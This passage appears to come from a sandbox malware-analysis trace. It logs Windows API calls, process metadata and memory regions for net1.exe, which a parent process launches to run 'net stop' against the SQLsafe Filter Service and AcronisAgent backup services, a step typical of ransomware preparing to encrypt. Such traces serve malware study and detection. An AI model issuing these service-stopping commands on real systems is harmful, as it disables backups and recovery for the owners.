0x1b5 [0088.597] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xfffbcec0 | out: lpCPInfo=0xfffbcec0) returned 1 [0088.597] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0088.598] sprintf_s (in: _DstBuf=0x28fc78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0088.599] setlocale (category=0, locale=".437") returned="English_United States.437" [0088.600] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0088.600] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0088.600] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"SQLsafe Filter Service\" /y" [0088.600] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28fa10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0088.600] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0088.600] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28fc68 | out: Buffer=0x28fc68*=0x10c0f0) returned 0x0 [0088.600] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28fc68 | out: Buffer=0x28fc68*=0x10c110) returned 0x0 [0088.600] _fileno (_File=0x7fefdba2a80) returned 0 [0088.600] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0088.600] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0088.600] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0088.600] _wcsicmp (_String1="config", _String2="stop") returned -16 [0088.600] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0088.601] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0088.601] _wcsicmp (_String1="file", _String2="stop") returned -13 [0088.601] _wcsicmp (_String1="files", _String2="stop") returned -13 [0088.601] _wcsicmp (_String1="group", _String2="stop") returned -12 [0088.601] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0088.601] _wcsicmp (_String1="help", _String2="stop") returned -11 [0088.601] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0088.601] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0088.601] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0088.601] _wcsicmp (_String1="session", _String2="stop") returned -15 [0088.601] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0088.601] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0088.601] _wcsicmp (_String1="share", _String2="stop") returned -12 [0088.601] _wcsicmp (_String1="start", _String2="stop") returned -14 [0088.601] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0088.601] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0088.601] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0088.601] _wcsicmp (_String1="accounts", _String2="SQLsafe Filter Service") returned -18 [0088.601] _wcsicmp (_String1="computer", _String2="SQLsafe Filter Service") returned -16 [0088.601] _wcsicmp (_String1="config", _String2="SQLsafe Filter Service") returned -16 [0088.601] _wcsicmp (_String1="continue", _String2="SQLsafe Filter Service") returned -16 [0088.601] _wcsicmp (_String1="cont", _String2="SQLsafe Filter Service") returned -16 [0088.601] _wcsicmp (_String1="file", _String2="SQLsafe Filter Service") returned -13 [0088.601] _wcsicmp (_String1="files", _String2="SQLsafe Filter Service") returned -13 [0088.601] _wcsicmp (_String1="group", _String2="SQLsafe Filter Service") returned -12 [0088.601] _wcsicmp (_String1="groups", _String2="SQLsafe Filter Service") returned -12 [0088.601] _wcsicmp (_String1="help", _String2="SQLsafe Filter Service") returned -11 [0088.601] _wcsicmp (_String1="helpmsg", _String2="SQLsafe Filter Service") returned -11 [0088.601] _wcsicmp (_String1="localgroup", _String2="SQLsafe Filter Service") returned -7 [0088.601] _wcsicmp (_String1="pause", _String2="SQLsafe Filter Service") returned -3 [0088.601] _wcsicmp (_String1="session", _String2="SQLsafe Filter Service") returned -12 [0088.601] _wcsicmp (_String1="sessions", _String2="SQLsafe Filter Service") returned -12 [0088.601] _wcsicmp (_String1="sess", _String2="SQLsafe Filter Service") returned -12 [0088.601] _wcsicmp (_String1="share", _String2="SQLsafe Filter Service") returned -9 [0088.601] _wcsicmp (_String1="start", _String2="SQLsafe Filter Service") returned 3 [0088.601] _wcsicmp (_String1="stats", _String2="SQLsafe Filter Service") returned 3 [0088.601] _wcsicmp (_String1="statistics", _String2="SQLsafe Filter Service") returned 3 [0088.601] _wcsicmp (_String1="stop", _String2="SQLsafe Filter Service") returned 3 [0088.602] _wcsicmp (_String1="time", _String2="SQLsafe Filter Service") returned 1 [0088.602] _wcsicmp (_String1="user", _String2="SQLsafe Filter Service") returned 2 [0088.602] _wcsicmp (_String1="users", _String2="SQLsafe Filter Service") returned 2 [0088.602] _wcsicmp (_String1="msg", _String2="SQLsafe Filter Service") returned -6 [0088.602] _wcsicmp (_String1="messenger", _String2="SQLsafe Filter Service") returned -6 [0088.602] _wcsicmp (_String1="receiver", _String2="SQLsafe Filter Service") returned -1 [0088.602] _wcsicmp (_String1="rcv", _String2="SQLsafe Filter Service") returned -1 [0088.602] _wcsicmp (_String1="netpopup", _String2="SQLsafe Filter Service") returned -5 [0088.602] _wcsicmp (_String1="redirector", _String2="SQLsafe Filter Service") returned -1 [0088.602] _wcsicmp (_String1="redir", _String2="SQLsafe Filter Service") returned -1 [0088.602] _wcsicmp (_String1="rdr", _String2="SQLsafe Filter Service") returned -1 [0088.602] _wcsicmp (_String1="workstation", _String2="SQLsafe Filter Service") returned 4 [0088.602] _wcsicmp (_String1="work", _String2="SQLsafe Filter Service") returned 4 [0088.602] _wcsicmp (_String1="wksta", _String2="SQLsafe Filter Service") returned 4 [0088.602] _wcsicmp (_String1="prdr", _String2="SQLsafe Filter Service") returned -3 [0088.602] _wcsicmp (_String1="devrdr", _String2="SQLsafe Filter Service") returned -15 [0088.602] _wcsicmp (_String1="lanmanworkstation", _String2="SQLsafe Filter Service") returned -7 [0088.602] _wcsicmp (_String1="server", _String2="SQLsafe Filter Service") returned -12 [0088.602] _wcsicmp (_String1="svr", _String2="SQLsafe Filter Service") returned 5 [0088.602] _wcsicmp (_String1="srv", _String2="SQLsafe Filter Service") returned 1 [0088.602] _wcsicmp (_String1="lanmanserver", _String2="SQLsafe Filter Service") returned -7 [0088.602] _wcsicmp (_String1="alerter", _String2="SQLsafe Filter Service") returned -18 [0088.602] _wcsicmp (_String1="netlogon", _String2="SQLsafe Filter Service") returned -5 [0088.602] _wcsupr (in: _String="SQLsafe Filter Service" | out: _String="SQLSAFE FILTER SERVICE") returned="SQLSAFE FILTER SERVICE" [0088.602] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x10ce20 [0088.606] GetServiceKeyNameW (in: hSCManager=0x10ce20, lpDisplayName="SQLSAFE FILTER SERVICE", lpServiceName=0xfffb5750, lpcchBuffer=0x28fb88 | out: lpServiceName="", lpcchBuffer=0x28fb88) returned 0 [0088.608] _wcsicmp (_String1="msg", _String2="SQLSAFE FILTER SERVICE") returned -6 [0088.608] _wcsicmp (_String1="messenger", _String2="SQLSAFE FILTER SERVICE") returned -6 [0088.608] _wcsicmp (_String1="receiver", _String2="SQLSAFE FILTER SERVICE") returned -1 [0088.608] _wcsicmp (_String1="rcv", _String2="SQLSAFE FILTER SERVICE") returned -1 [0088.608] _wcsicmp (_String1="redirector", _String2="SQLSAFE FILTER SERVICE") returned -1 [0088.608] _wcsicmp (_String1="redir", _String2="SQLSAFE FILTER SERVICE") returned -1 [0088.608] _wcsicmp (_String1="rdr", _String2="SQLSAFE FILTER SERVICE") returned -1 [0088.608] _wcsicmp (_String1="workstation", _String2="SQLSAFE FILTER SERVICE") returned 4 [0088.608] _wcsicmp (_String1="work", _String2="SQLSAFE FILTER SERVICE") returned 4 [0088.608] _wcsicmp (_String1="wksta", _String2="SQLSAFE FILTER SERVICE") returned 4 [0088.608] _wcsicmp (_String1="prdr", _String2="SQLSAFE FILTER SERVICE") returned -3 [0088.608] _wcsicmp (_String1="devrdr", _String2="SQLSAFE FILTER SERVICE") returned -15 [0088.608] _wcsicmp (_String1="lanmanworkstation", _String2="SQLSAFE FILTER SERVICE") returned -7 [0088.608] _wcsicmp (_String1="server", _String2="SQLSAFE FILTER SERVICE") returned -12 [0088.608] _wcsicmp (_String1="svr", _String2="SQLSAFE FILTER SERVICE") returned 5 [0088.608] _wcsicmp (_String1="srv", _String2="SQLSAFE FILTER SERVICE") returned 1 [0088.608] _wcsicmp (_String1="lanmanserver", _String2="SQLSAFE FILTER SERVICE") returned -7 [0088.608] _wcsicmp (_String1="alerter", _String2="SQLSAFE FILTER SERVICE") returned -18 [0088.609] _wcsicmp (_String1="netlogon", _String2="SQLSAFE FILTER SERVICE") returned -5 [0088.609] NetServiceControl (in: servername=0x0, service="SQLSAFE FILTER SERVICE", opcode=0x0, arg=0x0, bufptr=0x28fb90 | out: bufptr=0x28fb90) returned 0x889 [0088.609] wcscpy_s (in: _Destination=0xfffb80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0088.609] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0088.610] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xfffb5b50, nSize=0x800, Arguments=0xfffb7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0088.612] GetFileType (hFile=0xb) returned 0x2 [0088.613] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fa58 | out: lpMode=0x28fa58) returned 1 [0088.613] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffb5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x28fa50, lpReserved=0x0 | out: lpBuffer=0xfffb5b50*, lpNumberOfCharsWritten=0x28fa50*=0x1e) returned 1 [0088.613] GetFileType (hFile=0xb) returned 0x2 [0088.613] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fa58 | out: lpMode=0x28fa58) returned 1 [0088.614] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfff91efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28fa50, lpReserved=0x0 | out: lpBuffer=0xfff91efc*, lpNumberOfCharsWritten=0x28fa50*=0x2) returned 1 [0088.614] _ultow (in: _Dest=0x889, _Radix=2685632 | out: _Dest=0x889) returned="2185" [0088.614] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xfffb5b50, nSize=0x800, Arguments=0xfffb7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0088.614] GetFileType (hFile=0xb) returned 0x2 [0088.614] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fa58 | out: lpMode=0x28fa58) returned 1 [0088.614] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffb5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x28fa50, lpReserved=0x0 | out: lpBuffer=0xfffb5b50*, lpNumberOfCharsWritten=0x28fa50*=0x34) returned 1 [0088.615] GetFileType (hFile=0xb) returned 0x2 [0088.615] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fa58 | out: lpMode=0x28fa58) returned 1 [0088.615] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfff91efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28fa50, lpReserved=0x0 | out: lpBuffer=0xfff91efc*, lpNumberOfCharsWritten=0x28fa50*=0x2) returned 1 [0088.619] NetApiBufferFree (Buffer=0x10c0f0) returned 0x0 [0088.619] NetApiBufferFree (Buffer=0x10c110) returned 0x0 [0088.619] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"SQLsafe Filter Service\" /y" [0088.619] exit (_Code=2) Process: id = "89" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x203ad000" os_pid = "0x10d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "81" os_parent_pid = "0xe60" cmd_line = "C:\\Windows\\system32\\net1 stop AcronisAgent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4780 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4781 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4782 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4783 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 4784 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4785 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4786 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4787 start_va = 0xfff90000 end_va = 0xfffc2fff entry_point = 0xfff90000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4788 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4789 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4790 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 4791 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4792 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 4793 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4794 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4795 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4796 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4797 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4798 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 4799 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4800 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4801 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4802 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4803 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4804 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 4805 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4806 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4807 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4808 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4809 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4810 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 4811 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4812 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4813 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4814 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4815 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4816 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4817 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4845 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 480 os_tid = 0x10d8 [0088.653] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fbf0 | out: lpSystemTimeAsFileTime=0x14fbf0*(dwLowDateTime=0xea01c8b0, dwHighDateTime=0x1d48689)) [0088.653] GetCurrentProcessId () returned 0x10d4 [0088.653] GetCurrentThreadId () returned 0x10d8 [0088.653] GetTickCount () returned 0x2002e [0088.653] QueryPerformanceCounter (in: lpPerformanceCount=0x14fbf8 | out: lpPerformanceCount=0x14fbf8*=1813557100000) returned 1 [0088.654] GetModuleHandleW (lpModuleName=0x0) returned 0xfff90000 [0088.655] __set_app_type (_Type=0x1) [0088.655] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfffa9c9c) returned 0x0 [0088.655] __getmainargs (in: _Argc=0xfffb4780, _Argv=0xfffb4790, _Env=0xfffb4788, _DoWildCard=0, _StartInfo=0xfffb479c | out: _Argc=0xfffb4780, _Argv=0xfffb4790, _Env=0xfffb4788) returned 0 [0088.655] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0088.655] GetConsoleOutputCP () returned 0x1b5 [0088.655] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xfffbcec0 | out: lpCPInfo=0xfffbcec0) returned 1 [0088.655] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0088.657] sprintf_s (in: _DstBuf=0x14fb98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0088.658] setlocale (category=0, locale=".437") returned="English_United States.437" [0088.694] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0088.694] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0088.694] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AcronisAgent /y" [0088.694] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f930, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0088.694] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0088.695] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14fb88 | out: Buffer=0x14fb88*=0x254d50) returned 0x0 [0088.695] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14fb88 | out: Buffer=0x14fb88*=0x25c100) returned 0x0 [0088.695] _fileno (_File=0x7fefdba2a80) returned 0 [0088.695] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0088.695] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0088.695] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0088.695] _wcsicmp (_String1="config", _String2="stop") returned -16 [0088.695] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0088.695] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0088.695] _wcsicmp (_String1="file", _String2="stop") returned -13 [0088.695] _wcsicmp (_String1="files", _String2="stop") returned -13 [0088.695] _wcsicmp (_String1="group", _String2="stop") returned -12 [0088.695] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0088.695] _wcsicmp (_String1="help", _String2="stop") returned -11 [0088.695] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0088.695] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0088.695] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0088.695] _wcsicmp (_String1="session", _String2="stop") returned -15 [0088.695] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0088.695] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0088.695] _wcsicmp (_String1="share", _String2="stop") returned -12 [0088.695] _wcsicmp (_String1="start", _String2="stop") returned -14 [0088.695] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0088.695] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0088.695] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0088.696] _wcsicmp (_String1="accounts", _String2="AcronisAgent") returned -15 [0088.696] _wcsicmp (_String1="computer", _String2="AcronisAgent") returned 2 [0088.696] _wcsicmp (_String1="config", _String2="AcronisAgent") returned 2 [0088.696] _wcsicmp (_String1="continue", _String2="AcronisAgent") returned 2 [0088.696] _wcsicmp (_String1="cont", _String2="AcronisAgent") returned 2 [0088.696] _wcsicmp (_String1="file", _String2="AcronisAgent") returned 5 [0088.696] _wcsicmp (_String1="files", _String2="AcronisAgent") returned 5 [0088.696] _wcsicmp (_String1="group", _String2="AcronisAgent") returned 6 [0088.696] _wcsicmp (_String1="groups", _String2="AcronisAgent") returned 6 [0088.696] _wcsicmp (_String1="help", _String2="AcronisAgent") returned 7 [0088.696] _wcsicmp (_String1="helpmsg", _String2="AcronisAgent") returned 7 [0088.696] _wcsicmp (_String1="localgroup", _String2="AcronisAgent") returned 11 [0088.696] _wcsicmp (_String1="pause", _String2="AcronisAgent") returned 15 [0088.696] _wcsicmp (_String1="session", _String2="AcronisAgent") returned 18 [0088.696] _wcsicmp (_String1="sessions", _String2="AcronisAgent") returned 18 [0088.696] _wcsicmp (_String1="sess", _String2="AcronisAgent") returned 18 [0088.696] _wcsicmp (_String1="share", _String2="AcronisAgent") returned 18 [0088.696] _wcsicmp (_String1="start", _String2="AcronisAgent") returned 18 [0088.696] _wcsicmp (_String1="stats", _String2="AcronisAgent") returned 18 [0088.696] _wcsicmp (_String1="statistics", _String2="AcronisAgent") returned 18 [0088.696] _wcsicmp (_String1="stop", _String2="AcronisAgent") returned 18 [0088.696] _wcsicmp (_String1="time", _String2="AcronisAgent") returned 19 [0088.696] _wcsicmp (_String1="user", _String2="AcronisAgent") returned 20 [0088.696] _wcsicmp (_String1="users", _String2="AcronisAgent") returned 20 [0088.696] _wcsicmp (_String1="msg", _String2="AcronisAgent") returned 12 [0088.696] _wcsicmp (_String1="messenger", _String2="AcronisAgent") returned 12 [0088.696] _wcsicmp (_String1="receiver", _String2="AcronisAgent") returned 17 [0088.696] _wcsicmp (_String1="rcv", _String2="AcronisAgent") returned 17 [0088.696] _wcsicmp (_String1="netpopup", _String2="AcronisAgent") returned 13 [0088.696] _wcsicmp (_String1="redirector", _String2="AcronisAgent") returned 17 [0088.697] _wcsicmp (_String1="redir", _String2="AcronisAgent") returned 17 [0088.697] _wcsicmp (_String1="rdr", _String2="AcronisAgent") returned 17 [0088.697] _wcsicmp (_String1="workstation", _String2="AcronisAgent") returned 22 [0088.697] _wcsicmp (_String1="work", _String2="AcronisAgent") returned 22 [0088.697] _wcsicmp (_String1="wksta", _String2="AcronisAgent") returned 22 [0088.697] _wcsicmp (_String1="prdr", _String2="AcronisAgent") returned 15 [0088.697] _wcsicmp (_String1="devrdr", _String2="AcronisAgent") returned 3 [0088.697] _wcsicmp (_String1="lanmanworkstation", _String2="AcronisAgent") returned 11 [0088.697] _wcsicmp (_String1="server", _String2="AcronisAgent") returned 18 [0088.697] _wcsicmp (_String1="svr", _String2="AcronisAgent") returned 18 [0088.697] _wcsicmp (_String1="srv", _String2="AcronisAgent") returned 18 [0088.697] _wcsicmp (_String1="lanmanserver", _String2="AcronisAgent") returned 11 [0088.697] _wcsicmp (_String1="alerter", _String2="AcronisAgent") returned 9 [0088.697] _wcsicmp (_String1="netlogon", _String2="AcronisAgent") returned 13 [0088.697] _wcsupr (in: _String="AcronisAgent" | out: _String="ACRONISAGENT") returned="ACRONISAGENT" [0088.697] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x25ce10 [0088.701] GetServiceKeyNameW (in: hSCManager=0x25ce10, lpDisplayName="ACRONISAGENT", lpServiceName=0xfffb5750, lpcchBuffer=0x14faa8 | out: lpServiceName="", lpcchBuffer=0x14faa8) returned 0 [0088.702] _wcsicmp (_String1="msg", _String2="ACRONISAGENT") returned 12 [0088.702] _wcsicmp (_String1="messenger", _String2="ACRONISAGENT") returned 12 [0088.702] _wcsicmp (_String1="receiver", _String2="ACRONISAGENT") returned 17 [0088.702] _wcsicmp (_String1="rcv", _String2="ACRONISAGENT") returned 17 [0088.702] _wcsicmp (_String1="redirector", _String2="ACRONISAGENT") returned 17 [0088.703] _wcsicmp (_String1="redir", _String2="ACRONISAGENT") returned 17 [0088.703] _wcsicmp (_String1="rdr", _String2="ACRONISAGENT") returned 17 [0088.703] _wcsicmp (_String1="workstation", _String2="ACRONISAGENT") returned 22 [0088.703] _wcsicmp (_String1="work", _String2="ACRONISAGENT") returned 22 [0088.703] _wcsicmp (_String1="wksta", _String2="ACRONISAGENT") returned 22 [0088.703] _wcsicmp (_String1="prdr", _String2="ACRONISAGENT") returned 15 [0088.703] _wcsicmp (_String1="devrdr", _String2="ACRONISAGENT") returned 3 [0088.703] _wcsicmp (_String1="lanmanworkstation", _String2="ACRONISAGENT") returned 11 [0088.703] _wcsicmp (_String1="server", _String2="ACRONISAGENT") returned 18 [0088.703] _wcsicmp (_String1="svr", _String2="ACRONISAGENT") returned 18 [0088.703] _wcsicmp (_String1="srv", _String2="ACRONISAGENT") returned 18 [0088.703] _wcsicmp (_String1="lanmanserver", 